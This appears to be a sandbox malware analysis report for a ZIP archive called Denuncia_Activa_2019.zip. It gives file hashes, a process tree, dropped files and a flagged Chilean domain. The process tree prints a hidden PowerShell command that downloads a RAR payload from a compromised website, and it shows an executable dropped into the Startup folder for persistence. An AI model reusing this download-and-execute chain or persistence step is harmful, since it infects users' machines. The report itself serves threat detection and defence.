Field | Value |
---|---|
File name | Denuncia_Activa_2019.zip |
Full analysis | https://app.any.run/tasks/a9f3deef-6404-47e7-b15e-fee074dc2738 |
Verdict | Malicious activity |
Analysis date | March 21, 2019, 21:25:09 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators | |
MIME | application/zip |
File info | Zip multi-volume archive data, at least PKZIP v2.50 to extract |
MD5 | 32115E0D6B6EB32518DEFD936B25F97D |
SHA1 | 00C39BD8127C763F471728FF477EF1B48FC35ACB |
SHA256 | 35998E3024D31203BC55D15AC9AFEA81F77E6F5D463D982BBDE9523CB9DF5644 |
SSDEEP | 24:ZghpegV86FZn94+6bDu/1e9IPB3eAMxwu3+rze/UGWvnZzeMOhp2cl:ZspeA5FZnkbDC53e7O28G6n2pJ |
File type | .zip: ZIP compressed archive (multivolume) (100) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1052 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Denuncia_Activa_2019.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
928 | cmd /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIa1052.3928\__Denuncia_Activa_CL.PDF.bat" " | C:\Windows\system32\cmd.exe | — | WinRAR.exe |
2240 | C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\Rar$DIa1052.3928\__Denuncia_Activa_CL.PDF.bat" | C:\Windows\system32\cmd.exe | — | cmd.exe |
3980 | PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('https://www.triosalud.cl/wp/wp-content/uploads/2019/02/denuncias.rar','C:\Users\admin\Downloads\pmlgko0Qt.rar'); $Shell = New-Object -Com Shell.Application; $Zip = $Shell.NameSpace('C:\Users\admin\Downloads'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe |
688 | "C:\Program Files\WinRAR\winRar.exe" x -y -c "C:\Users\admin\Downloads\pmlgko0Qt.rar" "C:\Users\admin\Downloads" | C:\Program Files\WinRAR\WinRAR.exe | | cmd.exe |
4044 | ping 127.0.0.1 -n 1 | C:\Windows\system32\PING.EXE | — | cmd.exe |
1908 | shutdown -r | C:\Windows\system32\shutdown.exe | — | cmd.exe |

PID | User | Company | Integrity Level | Description | Exit code | Version |
---|---|---|---|---|---|---|
1052 | admin | Alexander Roshal | MEDIUM | WinRAR archiver | | 5.60.0 |
928 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 9009 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2240 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
3980 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
688 | admin | Alexander Roshal | MEDIUM | WinRAR archiver | 0 | 5.60.0 |
4044 | admin | Microsoft Corporation | MEDIUM | TCP/IP Ping Command | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
1908 | admin | Microsoft Corporation | MEDIUM | Windows Shutdown and Annotation Tool | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9HB5J59QK7DNJ7FLFM2A.temp | — | — | — |
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
1052 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa1052.3928\__Denuncia_Activa_CL.PDF.bat | text | 1E541B14B531BCAC70E77A012B0F0F7F | 9008B75AC8BBAACBDA0DC47BB7D631F1C791CB346CC6F6A911E7993DA0834C09 |
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfbb96.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
688 | WinRAR.exe | C:\Users\admin\AppData\Local\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe | executable | 410B77D8F1CDC76C867B4A6A27AE55E5 | 421448D92A6D871B218673025D4E4E121E263262F0CB5CD51E30853E2F8F04D7 |
3980 | powershell.exe | C:\Users\admin\Downloads\pmlgko0Qt.rar | compressed | AAFB4D8EBF63B50D80DAFF778226F7BC | B5A84E8079DC8558D3960D711D8591500B69CF79E750ECAF88919E398C59383F |
688 | WinRAR.exe | C:\Users\admin\Downloads\hello.txt | text | 49C5DDEBFDC0862208A6859B757DBB81 | 3C304DFF4CFAD593CE554D39EA6EA589B5E20A7831924CE0BD83539498C8E34D |
688 | WinRAR.exe | C:\Users\admin\Downloads\world.txt | text | 6E0D9920A8BA481D13EEB355147B13F3 | ED428CE14DC2EE5FCDEB3AD11E8DC315858F73BE187A4B072246B1B8662030A2 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3980 | powershell.exe | 190.107.177.246:443 | www.triosalud.cl | Gtd Internet S.A. | CL | malicious |
Domain | IP | Reputation |
---|---|---|
www.triosalud.cl | | malicious |